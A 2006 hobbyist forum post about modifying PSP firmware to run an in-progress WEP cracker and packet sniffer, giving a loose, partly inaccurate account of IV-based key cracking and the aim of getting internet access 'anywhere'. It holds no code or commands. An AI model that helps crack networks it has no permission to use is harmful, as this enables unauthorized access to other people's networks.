7/31/06 Updated News!
First off so sorry for not keeping the updates, I have been working on this for a bit, even bricked two psp's in the process but fortinatly was able to recover the second one with the custom firmware. I still haven't stopped doing this project, infact I have been working on it more since the Custom Firmware came out. But one problem i keep getting hit with is that when i add the wlan2.prn and try to hook it with the original sony wlan.prx it either bricks the psp (hence why no release) or the wifi stops working altogether. So to remove and get a norm psp I have to update then downgrade to get it taken off. Now funny part is I replaced the wlan.prx in devhook emulated 1.50 and i actually get a stable psp that won't brick or freeze and the wifi works. But still no luck on getting it to capture packets, not sure if its the prx or the app. So to eliminate one.
Heres the big news, Im currently gettting in contact with the Shmoo Group mainly Snax (creators of Airsnort) and see If they can give me a helping hand and getting airsnort ported to PSP, If so that problem will be eliminated and I can focus on getting the wlan2.prx and wlan.prx to hook properly and im gonna see if lord strum or someone can help me getting the firmware to register the hook (if i even gotta hook) rather just replace the wlan.prx and get it signed by "sony" that way it can not brick the psp and be seen as part of the firmware.
WEll with the two psp i have i have succesful downgraded to 1.0 which will let me run customfirmware. As well i got devhook to run custom firmware for 2.5 currently working witht he 2.6 firmware. I was able to modify easy stuff like gameboot.pmf and crap like that just to see if it works and it does so i think just replacing .prx that have similar string and code will work as well unless i just make a whole new firmware but that will require a lot of elp for im not so sure how to go that route.So here my call for help anyone interested in designing custom firmware please email me. Also i saw a very good thing for 2.6 it has a .prx called ad_hocdiscovery.prx which i believe is what is used to scan for players in which i can probably use to my advantage and write a new .prx and add it to the 4 .txt strings so it will boot up. I know i haven't posted in a while but with all these firmware hacks i wanted a chance to play around with them and see what i found and 2.6+ seems to be the winner with the .prx i found. Its nice to have devhook to test my fcustom firmware and not worry about bricking the psp. Now its time for the security tools to come alive.
EDIT: Just to make it clear I don't recommend the use of this for illegal use even thought thats all it does but to me rather then taht its for pure study how how the psp can be a security vulnerability. I have done quiet a lot of security check at my job with the pc and found some rather interesting result on how they affect a network so this is just my part to see how a hacktool can work.
EDIT # 2: Everyone keeps mentioning this is illegal. IM gonna say it one more time. Its not the program thats illegal, its the user and how they use it illegal. Just like Its illegal to download music but not illegal to use limewire (which allows you to dowload the music)
Im not sure if this post will be kept or my current project would be appreciated by the PSP Homebrew community and it might in fact be looked down on. But honestly this is more about proving the power the PSP has and abilities it can do. As of Right now Im currently working on a Wireless WEP Cracker. Its in the very early stages and currently i only got some success on a 1.0 PSP. For those that do not know what WEP is, it is Wired Equivalent Protocol. And is used to protect wireless networks or securing from just about anyone from accessing the network with a passphrase/ WEPKEY. What the WEP Cracker does is takes packets from the Wireless called IV these packets contains little bits of code that communicates with wireless cards (or psps) and trys to valadate the connection is legit. These packets have part of the passphrase/WEP Key. So if used with the Wireless Sniffer for the PSP you can pretty much get internet connection anywhere unless WPA is being used and I hope down the road to add a dictionary attack and brute force attack with the WEP Cracker for WPA but thats way down the road. My results so far is that the wireless files in the firmware actually need to be replaced with homebrew ones. So the wireless can be put in a monitor type mode to passively collect the packets. Thats where my problem lies I need to know the file for the wireless is called in the firmware. Perferbly for FW 1.5. Once i get taht i can start looking at the file and seeing where it can be altered or recreated with the Prism2 Driver type. Then installing it safely back on the psp tahts gonna be the hardest part. So I already got a dev for the actual program that runs on 1.0 alright gotta really work out the kinks. But any help would be appreciated or opinions. Just thought I would let everyone know.